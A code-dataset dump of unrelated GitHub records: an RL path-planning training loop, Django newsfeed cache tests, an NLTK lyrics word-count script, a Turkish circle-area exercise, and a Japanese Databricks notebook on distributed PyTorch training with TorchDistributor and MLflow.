os.path.join(saveFigPath, \"fig/Warm-Start-Case-{}.svg\").format(path_num))\n path_t = [env.deltaT * k for k in range(len(path.x))]\n saveCsv(path_t=path_t, path_x=path.x, path_y=path.y, path_v=path.v, path_yaw=path.yaw, path_a=path.a,\n path_steer=path.steer, path_steer_rate=path.steer_rate, init_x=env.case.x0, init_y=env.case.y0,\n sampleT=env.deltaT, save_path=saveFigPath, i=-1, j=0, case_num=path_num)\n refineOBCA(path.x, path.y, path.yaw, env.x_goal, env.y_goal, env.yaw_goal, env, path_num=path_num)\n\n\ndef refineOBCA(path_x, path_y, path_yaw, goal_x, goal_y, goal_yaw, env, path_num=7):\n print(\"================= Operate By OBCA ===================\")\n initialPath = []\n for i in range(len(path_x)):\n initialPath.append(OBCAPath(path_x[i], path_y[i], path_yaw[i]))\n initialPath.append(OBCAPath(goal_x, goal_y, goal_yaw))\n obstacles = []\n for obs_i in range(len(env.case.obs)):\n obs = list(env.case.obs[obs_i])\n obstacles.append(obs)\n\n # OBCA二次优化\n cfg = VehicleConfig()\n cfg.T = 0.1\n gap = 1\n sampleT = 0.1\n vehicle = Vehicle()\n path_x, path_y, path_v, path_yaw, path_steer, path_a, path_steer_rate = quadraticPath(\n initialQuadraticPath=initialPath, obstacles=obstacles,\n vehicle=vehicle, max_x=env.case.xmax, max_y=env.case.ymax,\n min_x=env.case.xmin, min_y=env.case.ymin,\n gap=gap, cfg=cfg, sampleT=sampleT)\n obcaPath = Path(path_x, path_y, path_yaw)\n show(obcaPath, env.case, path_num, os.path.join(saveFigPath, \"fig/OBCA-Warm-Start-Case-{}.svg\").format(path_num))\n\n\n\nif __name__ == '__main__':\n TOTAL_PATH_NUM = [1, 2, 3, 7, 8, 13, 14]\n PATH_NUM = [1, 2, 3, 7]\n args = get_args()\n # Init. Environment\n if args.random_choice:\n # if random.random() > 0.5:\n # path_num = args.case\n # else:\n # path_num = random.choice(PATH_NUM)\n path_num = random.choice(PATH_NUM)\n # 记录最好成绩\n test_num_score = {key: -math.inf for key in TOTAL_PATH_NUM}\n test_num_best_score = -math.inf\n train_num_score = {key: -math.inf for key in TOTAL_PATH_NUM}\n else:\n path_num = args.case\n test_best_score = -math.inf\n env = Environment(path_num, args=args)\n env.reset(path_num)\n # Init. tensorboard summary writer\n tb = SummaryWriter(log_dir=os.path.abspath('data/{}/tensorboard'.format(args.exp_name)))\n # Init. Datapath\n data_path = os.path.abspath('data/{}'.format(args.exp_name))\n\n saveFigPath = os.path.join(data_path, \"evaluate\")\n\n if not os.path.exists(saveFigPath):\n os.mkdir(saveFigPath)\n os.mkdir(os.path.join(saveFigPath, \"fig\"))\n os.mkdir(os.path.join(saveFigPath, \"svg\"))\n os.mkdir(os.path.join(saveFigPath, \"csv\"))\n\n # Init. Training\n n_games: int = 2500\n best_score = -np.inf\n score_history: List[float] = [] * n_games\n avg_history: List[float] = [] * n_games\n logging_info: List[Dict[str, float]] = [] * n_games\n\n # Init. Agent\n if args.action_c:\n if args.alg == \"SAC\":\n agent = SACAgent(env=env, n_games=n_games, args=args)\n elif args.alg == \"PPO\":\n agent = PPOAgent(env=env, n_games=n_games, args=args)\n args.ppo_update_timestep = int(args.maxT/0.1)\n elif args.alg == \"IBPPO\":\n agent = IBPPOAgent(env=env, n_games=n_games, args=args)\n args.ppo_update_timestep = int(args.maxT / 0.1)\n elif args.alg == \"IBDDPG\":\n agent = IBDDPGAgent(env=env, n_games=n_games, args=args)\n else:\n # default DDPG\n agent = PCAgent(env=env, n_games=n_games)\n else:\n if args.alg == \"IBPPO\":\n agent = IBPPOAgent(env=env, n_games=n_games, args=args)\n args.ppo_update_timestep = int(args.maxT / 0.1)\n else:\n # default DDPG\n agent = Agent(env=env, n_games=n_games)\n\n if args.warm_start:\n warm_start(args, agent, tb, path_num, env, saveFigPath)\n\n time_step = 0\n\n for i in range(n_games):\n done: bool = False\n score: float = 0.0\n\n states: List[Dict[str, np.ndarray]] = []\n actions: List[np.ndarray] = []\n one_hot_actions: List[np.ndarray] = []\n next_states: List[Dict[str, np.ndarray]] = []\n\n # Initial Reset of Environment\n if args.random_choice:\n # if random.random() > 0.5:\n # path_num = args.case\n # else:\n # path_num = random.choice(PATH_NUM)\n path_num = random.choice(PATH_NUM)\n else:\n path_num = args.case\n OBS: Dict[str, np.ndarray] = env.reset(path_num)\n next_OBS: Dict[str, np.array]\n\n\n while not done:\n # Unpack the observation\n # [状态,回放所用的目标点:当前的位置,真实的目标点]\n state, curr_actgoal, curr_desgoal = OBS.values()\n assert len(curr_actgoal) == 3 and len(curr_desgoal) == 3, \"Error!\"\n # obs = np.concatenate((state, curr_actgoal, curr_desgoal))\n obs = np.array(state)\n\n # Choose agent based action & make a transition\n if args.alg == \"IBDDPG\":\n action, log_prob = agent.choose_action(obs, evaluate=False)\n else:\n action = agent.choose_action(obs, evaluate=False)\n\n next_OBS, reward, done = env.step(action)\n\n\n next_state, next_actgoal, next_desgoal = next_OBS.values()\n assert len(next_actgoal) == 3 and len(next_desgoal) == 3, \"Error!\"\n # next_obs = np.concatenate((next_state, next_actgoal, next_desgoal))\n next_obs = np.array(next_state)\n\n if args.action_c:\n one_hot_action = action\n else:\n one_hot_action = torch.nn.functional.one_hot(torch.tensor(action), agent.n_actions).numpy()\n\n if args.alg == \"PPO\":\n agent.buffer.rewards.append(reward)\n agent.buffer.is_terminals.append(done)\n elif args.alg == \"IBPPO\":\n agent.buffer.rewards.append(torch.unsqueeze(torch.tensor(reward, device=agent.device), dim=-1))\n agent.buffer.masks.append(1 - done)\n elif args.alg == \"IBDDPG\":\n agent.memory.add(obs, one_hot_action, reward, log_prob, next_obs, done)\n else:\n agent.memory.add(obs, one_hot_action, reward, next_obs, done)\n\n if args.alg == \"SAC\":\n agent.optimize(tb)\n elif args.alg == \"PPO\":\n # if (time_step+1) % args.ppo_update_timestep == 0:\n if done:\n loss = agent.optimize(tb)\n tb.add_scalar('loss', loss, i)\n if (time_step+1) % args.ppo_std_decay_freq == 0:\n agent.decay_action_std(args.ppo_std_decay_rate, args.ppo_min_action_std)\n elif args.alg == \"IBPPO\":\n if done:\n entropy, value, policy_loss, value_loss, kl, loss = agent.optimize(tb)\n tb.add_scalar('entropy', entropy, i)\n tb.add_scalar('value', value, i)\n tb.add_scalar('policy_loss', policy_loss, i)\n tb.add_scalar('value_loss', value_loss, i)\n tb.add_scalar('kl', kl, i)\n tb.add_scalar('loss', loss, i)\n if (time_step+1) % args.ppo_std_decay_freq == 0:\n agent.decay_action_std(args.ppo_std_decay_rate, args.ppo_min_action_std)\n elif args.alg == \"IBDDPG\":\n agent.optimize(tb)\n if (time_step+1) % args.ppo_std_decay_freq == 0:\n agent.decay_action_std(args.ppo_std_decay_rate, args.ppo_min_action_std)\n else:\n # default DDPG\n agent.optimize(tb)\n\n\n states.append(OBS)\n next_states.append(next_OBS)\n actions.append(action)\n one_hot_actions.append(one_hot_action)\n\n OBS = next_OBS\n score += reward\n time_step += 1\n\n if args.her:\n her_augmentation(agent, states, one_hot_actions, next_states)\n score_history.append(score)\n avg_score: float = np.mean(score_history[-100:])\n avg_history.append(avg_score)\n\n tb.add_scalar('path_{}_score'.format(path_num), score, i)\n tb.add_scalar('avg_score', avg_score, i)\n\n if args.random_choice:\n if score > train_num_score[path_num]:\n train_num_score[path_num] = score\n agent.save_models(data_path)\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}'\n f'\\t *** MODEL SAVED SINGLE SCORE! ***')\n elif avg_score > best_score:\n best_score = avg_score\n agent.save_models(data_path)\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}'\n f'\\t *** MODEL SAVED AVERAGE SCORE! ***')\n else:\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}')\n else:\n if avg_score > best_score:\n best_score = avg_score\n agent.save_models(data_path)\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}'\n f'\\t *** MODEL SAVED! ***')\n else:\n print(f'Episode:{i}'\n f'\\t Path Num:{path_num}'\n f'\\t ACC. Rewards: {score:3.2f}'\n f'\\t AVG. Rewards: {avg_score:3.2f}')\n\n if i % args.evaluate_loop == 0:\n # 若是随机训练则每隔一定时间训练测试一次集合\n if args.random_choice:\n test_scores = []\n for path_num_item in TOTAL_PATH_NUM:\n test_score, path = test(agent=agent, path_num=path_num_item, env=env, args=args)\n test_scores.append(test_score)\n show(path, env.case, path_num_item,\n os.path.join(saveFigPath, \"fig/Case-{}-{}-{}.svg\").format(path_num_item, i, 0))\n path_t = [env.deltaT * k for k in range(len(path.x))]\n saveCsv(path_t=path_t, path_x=path.x, path_y=path.y, path_v=path.v, path_yaw=path.yaw,\n path_a=path.a,\n path_steer=path.steer, path_steer_rate=path.steer_rate, init_x=env.case.x0,\n init_y=env.case.y0,\n sampleT=env.deltaT, save_path=saveFigPath, i=i, j=0, case_num=path_num_item)\n if test_score > test_num_score[path_num_item]:\n print(\"Path Num: {} Occur The Best Score: {}\".format(path_num_item, test_score))\n test_num_score[path_num_item] = test_score\n show(path, env.case, path_num_item,\n os.path.join(saveFigPath, \"fig/Best-Case-{}-{}-{}.svg\").format(path_num_item, i, test_score))\n if path_num_item == 3:\n a = 1\n refineOBCA(path.x, path.y, path.yaw, env.x_goal, env.y_goal, env.yaw_goal, env,\n path_num=path_num_item)\n tb.add_scalar('test_path_{}_score'.format(path_num_item), test_score, int(i/args.evaluate_loop))\n tb.add_scalar('test_path_total_score', sum(test_scores), int(i / args.evaluate_loop))\n\n else:\n test_score, path = test(agent=agent, path_num=path_num, env=env, args=args)\n show(path, env.case, path_num, os.path.join(saveFigPath, \"fig/Case-{}-{}-{}.svg\").format(path_num, i, 0))\n path_t = [env.deltaT * k for k in range(len(path.x))]\n saveCsv(path_t=path_t, path_x=path.x, path_y=path.y, path_v=path.v, path_yaw=path.yaw, path_a=path.a,\n path_steer=path.steer, path_steer_rate=path.steer_rate, init_x=env.case.x0, init_y=env.case.y0,\n sampleT=env.deltaT, save_path=saveFigPath, i=i, j=0, case_num=path_num)\n if test_score > test_best_score:\n test_best_score = test_score\n print(\"Path Num: {} Occur The Best Score: {}\".format(path_num, test_score))\n show(path, env.case, path_num,\n os.path.join(saveFigPath, \"fig/Best-Case-{}-{}-{}.svg\").format(path_num, i, test_score))\n # 没获取到最优的路径后使用obca优化\n refineOBCA(path.x, path.y, path.yaw, env.x_goal, env.y_goal, env.yaw_goal, env, path_num=path_num)\n tb.add_scalar('test_path_{}_score'.format(path_num), test_score, int(i / args.evaluate_loop))\n\n\n episode_info = {\n 'Episode': i,\n 'Path Num': path_num,\n 'Total Episodes': n_games,\n 'Epidosic Summed Rewards': score,\n 'Moving Mean of Episodic Rewards': avg_score\n }\n\n logging_info.append(episode_info)\n\n # Add info. to tensorboard\n # tb.add_scalars('training_rewards',\n # {'Epidosic Summed Rewards': score,\n # 'Moving Mean of Episodic Rewards': avg_score}, i)\n\n # Dump .json\n with open(os.path.join(data_path, 'training_info.json'), 'w', encoding='utf8') as file:\n json.dump(logging_info, file, indent=4, ensure_ascii=False)\n\n # Close tensorboard writer\n tb.close()\n","repo_name":"its-ant-bupt/HALOES","sub_path":"rl/sparse_rewards/prioritized/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":25982,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"78"} +{"seq_id":"24623177913","text":"from newsfeeds.services import NewsFeedService\nfrom testing.testcases import TestCase\nfrom twitter.cache import USER_NEWSFEEDS_PATTERN\nfrom utils.redis_client import RedisClient\n\n\nclass NewsFeedServiceTests(TestCase):\n\n def setUp(self):\n super(NewsFeedServiceTests, self).setUp()\n self.kellynim = self.create_user('kellynim')\n self.talenti = self.create_user('talenti')\n\n def test_get_user_newsfeeds(self):\n newsfeed_ids = []\n for i in range(3):\n tweet = self.create_tweet(self.talenti)\n newsfeed = self.create_newsfeed(self.kellynim, tweet)\n newsfeed_ids.append(newsfeed.id)\n newsfeed_ids = newsfeed_ids[::-1]\n\n # cache miss\n newsfeeds = NewsFeedService.get_cached_newsfeeds(self.kellynim.id)\n self.assertEqual([f.id for f in newsfeeds], newsfeed_ids)\n\n # cache hit\n newsfeeds = NewsFeedService.get_cached_newsfeeds(self.kellynim.id)\n self.assertEqual([f.id for f in newsfeeds], newsfeed_ids)\n\n # cache updated\n tweet = self.create_tweet(self.kellynim)\n new_newsfeed = self.create_newsfeed(self.kellynim, tweet)\n newsfeeds = NewsFeedService.get_cached_newsfeeds(self.kellynim.id)\n newsfeed_ids.insert(0, new_newsfeed.id)\n self.assertEqual([f.id for f in newsfeeds], newsfeed_ids)\n\n def test_create_new_newsfeed_before_get_cached_newsfeeds(self):\n feed1 = self.create_newsfeed(self.kellynim, self.create_tweet(self.kellynim))\n\n RedisClient.clear()\n conn = RedisClient.get_connection()\n\n key = USER_NEWSFEEDS_PATTERN.format(user_id=self.kellynim.id)\n self.assertEqual(conn.exists(key), False)\n feed2 = self.create_newsfeed(self.kellynim, self.create_tweet(self.kellynim))\n self.assertEqual(conn.exists(key), True)\n\n feeds = NewsFeedService.get_cached_newsfeeds(self.kellynim.id)\n self.assertEqual([f.id for f in feeds], [feed2.id, feed1.id])\n","repo_name":"yw1101/django-socialmedia","sub_path":"newsfeeds/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"16355928409","text":"import json\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nimport string\n\n\ndef artist_used_most(search_word: str, clean_artist_lyric_list: list):\n\n \"\"\"\n Get top 5 artists who used word most.\n\n :param search_word: From input box on homepage of Flask app.\n :param clean_artist_lyric_list: List of dictionaries of artists and all their lyrics.\n :return: List of artists and word count.\n \"\"\"\n\n # get the word counts of all artists\n word_count_list = []\n for index in range(len(clean_artist_lyric_list)):\n try:\n word_counts = {'Artist': clean_artist_lyric_list[index]['Artist'],\n 'Lyrics count': clean_artist_lyric_list[index]['Lyrics'].lower().count(search_word)}\n word_count_list.append(word_counts)\n except KeyError:\n continue\n word_count_list = sorted(word_count_list, key=lambda item: item['Lyrics count'], reverse=True)\n\n return word_count_list[0:5]\n\n\ndef clean_data():\n \"\"\"\"\n Takes the original json and cleans it using NLTK. Take out punctuation and most stop words.\n\n Currently not working 100% correctly.\n \"\"\"\n\n file = 'artist_lyrics.json'\n with open(file) as file_object:\n json_object = json.load(file_object)\n\n stop_words = set(stopwords.words('english'))\n more_to_remove = ['', '`', 'nt', 'gon', '’']\n stop_words.update(more_to_remove)\n punctuation_table = str.maketrans('', '', string.punctuation)\n\n for artist in json_object:\n if len(artist) > 1:\n split_lyrics = word_tokenize(artist['Lyrics'].lower().strip())\n no_punctuation = [words.translate(punctuation_table) for words in split_lyrics]\n cleaned = [word for word in no_punctuation if word not in stop_words]\n artist['Lyrics'] = \" \".join(cleaned)\n\n else:\n continue\n\n with open(file, 'w+') as file_object:\n json.dump(json_object, file_object)\n\n\ndef open_file():\n filename = 'artist_lyrics.json'\n with open(filename) as file_object:\n json_obj = json.load(file_object)\n return json_obj\n\n\ndef main():\n search_word = \"Home\".lower()\n artist_lyric_dict = open_file()\n artist_used_most(search_word, artist_lyric_dict)\n clean_data()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"JordanGunn/LyriCount","sub_path":"artist_used_most.py","file_name":"artist_used_most.py","file_ext":"py","file_size_in_byte":2310,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28942812189","text":"\"\"\"\nDaire Alanı : pi*r**2\nDaire ÇEvresi: 2*pi*r\n\n**Yarı çapı verilen bir dairenin alan ve çevresini hesaplayınız\n** (r: 3.14)\n\"\"\"\n\npi = 3.14 #zorunlu deger\n\nr= float(input(\"Yarı Çapı Giriniz: \")) # burada tek girdimiz r(yarıçap) olduğu için input degeri verdik çünkü alan ve çevre hesabı yapılırken yarıçap kullanılmaktadır.\n# Ayrıca float'a donusturme nedinmiz r(yarıçapın) ondalıklı olma ihtimali yüzündendir\n\nalan = pi*r**2\ncevre = float(2*pi*r)\n\nprint(\"Alanı: \", str(alan) + \" Çevresi:\", str(cevre)) # BURADA str(alan) - str(cevre) yapma nedenimiz: float sayılar ile string birleştirme işleminde kullanmadıgımızdan dolayı\n\n# print(\"Dairenin Alanı: \",alan)\n# print(\"Dairenin Çevre Uzunluğu\", cevre)","repo_name":"aliiskk/road-to-python","sub_path":"1-Python Objects/5-type-conversion-demo.py","file_name":"5-type-conversion-demo.py","file_ext":"py","file_size_in_byte":748,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"26162239961","text":"# Databricks notebook source\n# MAGIC %md\n# MAGIC # Databricksノートブックにおけるエンドツーエンドの分散トレーニング\n# MAGIC \n# MAGIC PyTorchにおける分散トレーニングは多くの場合、ファイル(`train.py`)を作成し、そのファイルを用いた分散トレーニングを実行するために`torchrun` CLIを使用します。Databricksでは、Databricksノートブック上で直接分散トレーニングを実行するメソッドを提供します。ノートブック内で`train()`関数を定義し、複数のワーカーでモデルをトレーニングするために`TorchDistributor` APIを使用することができます。\n# MAGIC \n# MAGIC このノートブックでは、どのようにノートブック内でインタラクティブな開発を行うのかを説明します。特に大規模なディープラーニングプロジェクトにおいては、ご自身のコードを管理可能なチャンクに分割するために`%run`コマンドを活用することを推奨します。\n# MAGIC \n# MAGIC このノートブックでは:\n# MAGIC - 古典的なMNISTデータセットに対してシンプルな単一GPUモデルをトレーニングします。\n# MAGIC - 分散トレーニングのコードに変換します。\n# MAGIC - 複数GPUあるいは複数ノードにモデルのトレーニングをスケールアップするために、どのようにTorchDistributorを活用できるのかを学びます。\n# MAGIC \n# MAGIC ## 要件\n# MAGIC - Databricks Runtime ML 13.0以降\n# MAGIC - (推奨) GPUインスタンス [AWS](https://docs.databricks.com/clusters/gpu.html) | [Azure](https://learn.microsoft.com/en-gb/azure/databricks/clusters/gpu) | [GCP](https://docs.gcp.databricks.com/clusters/gpu.html)\n\n# COMMAND ----------\n\n# MAGIC %md \n# MAGIC \n# MAGIC ### MLflowのセットアップ\n# MAGIC \n# MAGIC MLflowは機械学習エクスペリメントとモデルのロギングをサポートするツールです。\n# MAGIC \n# MAGIC **注意** MLflow PyTorch Autologging APIはPyTorch Lightning向けに設計されており、ネイティブなPyTorchでは動作しません。\n\n# COMMAND ----------\n\nimport mlflow\n\nusername = spark.sql(\"SELECT current_user()\").first()['current_user()']\nusername\n\nexperiment_path = f'/Users/{username}/pytorch-distributor'\n\n# これらは後で必要となります\ndb_host = \"https:///\" # 変更してください!\ndb_token = dbutils.notebook.entry_point.getDbutils().notebook().getContext().apiToken().get()\n\n# IDを確認し、スケールする際にワーカーノードに送信できるように、手動でエクスペリメントを作成します\nexperiment = mlflow.set_experiment(experiment_path)\n\n# COMMAND ----------\n\n# MAGIC %md ## トレーニング、テスト関数の定義\n# MAGIC \n# MAGIC 以下のセルには、モデルを記述するコード、トレーニング関数、テスト関数が含まれています。これらすべてはローカルで実行するようにデザインされています。次に、このコードにはローカル環境から分散環境でのトレーニングへの移行に必要な変更が導入されます。\n# MAGIC \n# MAGIC すべてのtorchコードは標準的なPyTorch APIを活用しており、カスタムライブラリやコードの記述方法の変更は不要です。このノートブックは`TorchDistributor`を用いたトレーニングのスケール方法にフォーカスしているので、モデルコードの説明はしません。\n\n# COMMAND ----------\n\nimport torch\nNUM_WORKERS = 2\nNUM_GPUS_PER_NODE = torch.cuda.device_count()\n\n# COMMAND ----------\n\nPYTORCH_DIR = '/dbfs/ml/pytorch'\n\nbatch_size = 100\nnum_epochs = 3\nmomentum = 0.5\nlog_interval = 100\nlearning_rate = 0.001\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# モデルの定義\nclass Net(nn.Module):\n def __init__(self):\n super(Net, self).__init__()\n self.conv1 = nn.Conv2d(1, 10, kernel_size=5)\n self.conv2 = nn.Conv2d(10, 20, kernel_size=5)\n self.conv2_drop = nn.Dropout2d()\n self.fc1 = nn.Linear(320, 50)\n self.fc2 = nn.Linear(50, 10)\n\n def forward(self, x):\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))\n x = x.view(-1, 320)\n x = F.relu(self.fc1(x))\n x = F.dropout(x, training=self.training)\n x = self.fc2(x)\n return F.log_softmax(x)\n\ndef train_one_epoch(model, device, data_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(data_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(data_loader) * len(data),\n 100. * batch_idx / len(data_loader), loss.item()))\n \n mlflow.log_metric('train_loss', loss.item())\n\ndef save_checkpoint(log_dir, model, optimizer, epoch):\n filepath = log_dir + '/checkpoint-{epoch}.pth.tar'.format(epoch=epoch)\n state = {\n 'model': model.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }\n torch.save(state, filepath)\n \ndef load_checkpoint(log_dir, epoch=num_epochs):\n filepath = log_dir + '/checkpoint-{epoch}.pth.tar'.format(epoch=epoch)\n return torch.load(filepath)\n\ndef create_log_dir():\n log_dir = os.path.join(PYTORCH_DIR, str(time()))\n os.makedirs(log_dir)\n return log_dir\n\nimport torch.optim as optim\nfrom torchvision import datasets, transforms\nfrom time import time\nimport os\n\nbase_log_dir = create_log_dir()\nprint(\"Log directory:\", base_log_dir)\n\ndef train(log_dir):\n device = torch.device('cuda')\n\n train_parameters = {'batch_size': batch_size, 'epochs': num_epochs}\n mlflow.log_params(train_parameters)\n \n train_dataset = datasets.MNIST(\n 'data', \n train=True,\n download=True,\n transform=transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]))\n data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, shuffle=True)\n\n model = Net().to(device)\n\n optimizer = optim.SGD(model.parameters(), lr=learning_rate, momentum=momentum)\n\n for epoch in range(1, num_epochs + 1):\n train_one_epoch(model, device, data_loader, optimizer, epoch)\n save_checkpoint(log_dir, model, optimizer, epoch)\n \ndef test(log_dir):\n device = torch.device('cuda')\n loaded_model = Net().to(device)\n scripted_model = torch.jit.script(loaded_model)\n \n checkpoint = load_checkpoint(log_dir)\n loaded_model.load_state_dict(checkpoint['model'])\n loaded_model.eval()\n\n test_dataset = datasets.MNIST(\n 'data', \n train=False,\n download=True,\n transform=transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]))\n data_loader = torch.utils.data.DataLoader(test_dataset)\n\n test_loss = 0\n for data, target in data_loader:\n data, target = data.to(device), target.to(device)\n output = loaded_model(data)\n test_loss += F.nll_loss(output, target)\n \n test_loss /= len(data_loader.dataset)\n print(\"Average test loss: {}\".format(test_loss.item()))\n \n mlflow.log_metric('test_loss', test_loss.item())\n \n mlflow.pytorch.log_model(scripted_model, \"model\")\n \n\n# COMMAND ----------\n\n# MAGIC %md ### ローカルでモデルをトレーニング\n# MAGIC \n# MAGIC これが適切に動作することをテストするために、上で定義した関数を用いてトレーニングとテストのイテレーションを起動することができます。\n\n# COMMAND ----------\n\nwith mlflow.start_run():\n \n mlflow.log_param('run_type', 'local')\n train(base_log_dir)\n test(base_log_dir)\n \n\n# COMMAND ----------\n\n# MAGIC %md ## 分散セットアップ\n# MAGIC \n# MAGIC シングルノードのコードを`train()`関数でラッピングする際、ライブラリのpickleに関する問題を避けるために、すべてのimport文を`train()`関数に含めることを推奨します。\n# MAGIC \n# MAGIC 他の全ては、PyTorch内で分散トレーニングが動作するようにするために通常必要となるものです。\n# MAGIC \n# MAGIC - `train()`の最初で`dist.init_process_group(\"nccl\")`の呼び出し\n# MAGIC - `train()`の最後で`dist.destroy_process_group()`の呼び出し\n# MAGIC - `local_rank = int(os.environ[\"LOCAL_RANK\"])`の設定\n# MAGIC - `DataLoader`に`DistributedSampler`を追加\n# MAGIC - `DDP(model)`でモデルをラッピング\n# MAGIC - 詳細は https://pytorch.org/tutorials/intermediate/ddp_series_multinode.html をご覧ください\n\n# COMMAND ----------\n\nsingle_node_single_gpu_dir = create_log_dir()\nprint(\"Data is located at: \", single_node_single_gpu_dir)\n\ndef train_one_epoch(model, device, data_loader, optimizer, epoch):\n model.train()\n for batch_idx, (data, target) in enumerate(data_loader):\n data, target = data.to(device), target.to(device)\n optimizer.zero_grad()\n output = model(data)\n loss = F.nll_loss(output, target)\n loss.backward()\n optimizer.step()\n if batch_idx % log_interval == 0:\n print('Train Epoch: {} [{}/{} ({:.0f}%)]\\tLoss: {:.6f}'.format(\n epoch, batch_idx * len(data), len(data_loader) * len(data),\n 100. * batch_idx / len(data_loader), loss.item()))\n \n if int(os.environ[\"RANK\"]) == 0:\n mlflow.log_metric('train_loss', loss.item())\n\ndef save_checkpoint(log_dir, model, optimizer, epoch):\n filepath = log_dir + '/checkpoint-{epoch}.pth.tar'.format(epoch=epoch)\n state = {\n 'model': model.module.state_dict(),\n 'optimizer': optimizer.state_dict(),\n }\n torch.save(state, filepath)\n\n# 分散トレーニングでは、1つのmain関数にトレーニングステップとテストステップをマージします\ndef main_fn(directory):\n \n #### ここにimport文を追加 ####\n import mlflow\n import torch.distributed as dist\n from torch.nn.parallel import DistributedDataParallel as DDP\n from torch.utils.data.distributed import DistributedSampler\n \n ############################\n\n ##### MLflowのセットアップ ####\n # 別々のプロセスがMLflowを見つけられるようにするためにこれが必要です\n os.environ['DATABRICKS_HOST'] = db_host\n os.environ['DATABRICKS_TOKEN'] = db_token\n\n # エクスペリメントの詳細をここで設定します\n experiment = mlflow.set_experiment(experiment_path)\n ############################\n \n print(\"Running distributed training\")\n dist.init_process_group(\"nccl\")\n \n local_rank = int(os.environ[\"LOCAL_RANK\"])\n global_rank = int(os.environ[\"RANK\"])\n \n if global_rank == 0:\n train_parameters = {'batch_size': batch_size, 'epochs': num_epochs, 'trainer': 'TorchDistributor'}\n mlflow.log_params(train_parameters)\n \n train_dataset = datasets.MNIST(\n 'data',\n train=True,\n download=True,\n transform=transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]))\n \n #### 分散データローダーの追加 ####\n train_sampler = DistributedSampler(dataset=train_dataset)\n data_loader = torch.utils.data.DataLoader(train_dataset, batch_size=batch_size, sampler=train_sampler)\n ######################################\n \n model = Net().to(local_rank)\n #### 分散モデルの追加 ####\n ddp_model = DDP(model, device_ids=[local_rank], output_device=local_rank)\n #################################\n\n optimizer = optim.SGD(ddp_model.parameters(), lr=learning_rate, momentum=momentum)\n for epoch in range(1, num_epochs + 1):\n train_one_epoch(ddp_model, local_rank, data_loader, optimizer, epoch)\n \n if global_rank == 0: \n save_checkpoint(directory, ddp_model, optimizer, epoch)\n \n # テスト用にモデルを保存\n if global_rank == 0:\n mlflow.pytorch.log_model(ddp_model, \"model\")\n \n ddp_model.eval()\n test_dataset = datasets.MNIST(\n 'data', \n train=False,\n download=True,\n transform=transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.1307,), (0.3081,))]))\n data_loader = torch.utils.data.DataLoader(test_dataset) \n\n test_loss = 0\n for data, target in data_loader:\n device = torch.device('cuda')\n data, target = data.to(device), target.to(device)\n output = ddp_model(data)\n test_loss += F.nll_loss(output, target)\n \n test_loss /= len(data_loader.dataset)\n print(\"Average test loss: {}\".format(test_loss.item()))\n \n mlflow.log_metric('test_loss', test_loss.item())\n\n \n dist.destroy_process_group()\n \n return \"finished\" # 任意のpickle可能なオブジェクトを返却できます\n\n# COMMAND ----------\n\n# MAGIC %md\n# MAGIC \n# MAGIC ### TorchDistributorなしのテスト\n# MAGIC \n# MAGIC 以下では、シングルGPUでトレーニングを実行することでトレーニングループを検証します。\n\n# COMMAND ----------\n\n# すべてのプロセスが動作していることをクイックにテストするためのシングルノードにおける分散実行\nwith mlflow.start_run():\n mlflow.log_param('run_type', 'test_dist_code')\n main_fn(single_node_single_gpu_dir)\n \n\n# COMMAND ----------\n\n# MAGIC %md ### マルチGPUシングルノードのトレーニング\n# MAGIC \n# MAGIC PyTorchでは、マルチGPUシングルノードでトレーニングを行うための[roundabout way](https://pytorch.org/tutorials/beginner/ddp_series_multigpu.html)を提供しています。Databricksでは、マルチGPUシングルノードをマルチノードにシームレスに移行できるより効率的なソリューションを提供しています。DatabricksでマルチGPUシングルノードのトレーニングを行うには、`TorchDistributor` APIを呼び出し、使用したいドライバーノードで利用できるGPUの数を`num_processes`に設定し、`local_mode=True`を設定します。\n\n# COMMAND ----------\n\nsingle_node_multi_gpu_dir = create_log_dir()\nprint(\"Data is located at: \", single_node_multi_gpu_dir)\n\nfrom pyspark.ml.torch.distributor import TorchDistributor\n\noutput = TorchDistributor(num_processes=2, local_mode=True, use_gpu=True).run(main_fn, single_node_multi_gpu_dir)\ntest(single_node_multi_gpu_dir)\n\n# COMMAND ----------\n\n# MAGIC %md ### マルチノードのトレーニング\n# MAGIC \n# MAGIC 